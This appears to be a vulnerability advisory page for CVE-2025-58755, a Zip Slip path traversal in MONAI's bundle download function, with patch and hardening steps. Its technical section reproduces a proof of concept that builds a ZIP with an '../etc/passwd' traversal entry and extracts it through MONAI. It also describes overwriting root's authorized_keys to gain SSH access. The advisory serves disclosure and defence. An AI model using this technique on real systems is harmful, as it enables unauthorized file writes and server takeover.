AI Threat Alert AI Threat Alert

CVE-2025-58755: MONAI: path traversal allows arbitrary file write

GHSA-x6ww-pf9m-m73m HIGH PoC AVAILABLE
Published September 9, 2025
CISO Take

MONAI bundle downloads are vulnerable to Zip Slip — a malicious ZIP hosted anywhere online can overwrite system files on ML workstations or training servers when extracted. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

Risk Assessment

High risk for AI/ML teams using MONAI bundle downloads. CVSS 8.8 with network vector, low complexity, and low privileges required. Attack surface is broad: MONAI is prevalent in medical imaging AI pipelines and researchers routinely pull bundles from community sources like HuggingFace, GitHub, and MONAI Hub. An attacker who can host a ZIP (or MITM a download) achieves arbitrary file write without meaningful user interaction beyond the normal bundle workflow. Containerized training environments frequently run as root, amplifying impact.

Affected Systems

Package Ecosystem Vulnerable Range Patched
monai pip <= 1.5.0 1.5.1
8.1K OpenSSF 7.0 105 dependents Pushed 8d ago 100% patched ~15d to patch Full package profile →

Do you use monai? You're affected.

Severity & Risk

CVSS 3.1
8.8 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 32% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps

  1. PATCH

    Upgrade to monai >= 1.5.1 immediately (pip install --upgrade monai).

  2. AUDIT

    Run pip freeze | grep monai across all ML training and inference systems.

  3. DETECT

    Review file system audit logs for unexpected writes outside bundle extraction directories during MONAI operations.

  4. WORKAROUND (if immediate patch is blocked): Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download.

  5. HARDEN

    Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Code Execution Framework AML.T0002.001 AML.T0010.001 AML.T0011.000 AML.T0049

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.6.1.4 - AI supply chain management
NIST AI RMF
MANAGE 2.2 - Prioritize and apply risk treatments for AI risks
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-58755?

MONAI bundle downloads are vulnerable to Zip Slip — a malicious ZIP hosted anywhere online can overwrite system files on ML workstations or training servers when extracted. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

Is CVE-2025-58755 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58755, increasing the risk of exploitation.

How to fix CVE-2025-58755?

1. PATCH: Upgrade to monai >= 1.5.1 immediately (`pip install --upgrade monai`). 2. AUDIT: Run `pip freeze | grep monai` across all ML training and inference systems. 3. DETECT: Review file system audit logs for unexpected writes outside bundle extraction directories during MONAI operations. 4. WORKAROUND (if immediate patch is blocked): Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download. 5. HARDEN: Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

What systems are affected by CVE-2025-58755?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps/CI pipelines.

What is the CVSS score for CVE-2025-58755?

CVE-2025-58755 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.13%.

Technical Details

NVD Description

### Summary The extractall function ```zip_file.extractall(output_dir)``` is used directly to process compressed files. It is used in many places in the project. When the Zip file containing malicious content is decompressed, it will overwrite the system files. In addition, the project allows the download of the zip content through the link, which increases the scope of exploitation of this vulnerability. When reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file. ``` root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo "malicious content" > test_bundle/malicious.txt root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd adding: malicious.txt (stored 0%) adding: ../../../../../../etc/passwd (deflated 64%) root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd .. root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls malicious.zip p1.py p2.py r1.py test_bundle ``` Then start the http service through python ``` root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` Another terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc. ``` root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c "from monai.bundle.scripts import download; download(name='test_bundle', url='http://localhost:8000/malicious.zip', bundle_dir='/tmp/test_extract')" 2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download --- 2025-08-11 20:49:01,668 - INFO - > name: 'test_bundle' 2025-08-11 20:49:01,668 - INFO - > bundle_dir: '/tmp/test_extract' 2025-08-11 20:49:01,668 - INFO - > source: 'monaihosting' 2025-08-11 20:49:01,668 - INFO - > url: 'http://localhost:8000/malicious.zip' 2025-08-11 20:49:01,668 - INFO - > remove_prefix: 'monai_' 2025-08-11 20:49:01,668 - INFO - > progress: True 2025-08-11 20:49:01,668 - INFO - --- test_bundle.zip: 8.00kB [00:00, 204kB/s] 2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip 2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip. 2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract. 2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json. root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls / autodl-pub cuda-keyring_1.0-1_all.deb home lib32 **malicious.txt** opt run sys var bin dev init lib64 media proc sbin tmp boot etc lib libx32 mnt root srv usr ``` We can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file. If the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage. ### Impact Arbitrary file write ### Repair Suggestions Check the contents of the downloaded Zip file, or use a safer method to load it

Exploitation Scenario

Attacker uploads a crafted ZIP to HuggingFace, a research Slack channel, or a community forum frequented by medical AI teams. The ZIP contains an entry with a traversal path (e.g., `../../../../../root/.ssh/authorized_keys`) populated with the attacker's public key. An ML engineer follows a tutorial or colleague recommendation and runs `monai.bundle.scripts.download(url='<attacker-url>', bundle_dir='/tmp/model')`. MONAI downloads and calls `extractall()` without path sanitization, writing the attacker's key into root's authorized_keys. The attacker gains SSH access to a GPU training server, potentially with access to patient imaging datasets and downstream clinical AI model artifacts.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
September 9, 2025
Last Modified
September 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities

HIGH CVE-2025-58757 8.8

MONAI: unsafe pickle deserialization RCE in data pipeline

Same package: monai
HIGH CVE-2025-58756 8.8

MONAI: unsafe deserialization in CheckpointLoader allows RCE

Same package: monai
HIGH GHSA-89gg-p5r5-q6r4 7.7

MONAI: pickle deserialization RCE in Auto3DSeg

Same package: monai
MEDIUM CVE-2026-21851 5.3

monai: Path Traversal enables file access

Same package: monai
CRITICAL CVE-2024-2912 10.0

BentoML: RCE via insecure deserialization (CVSS 10)

Same attack type: Supply Chain
Back to Threat Feed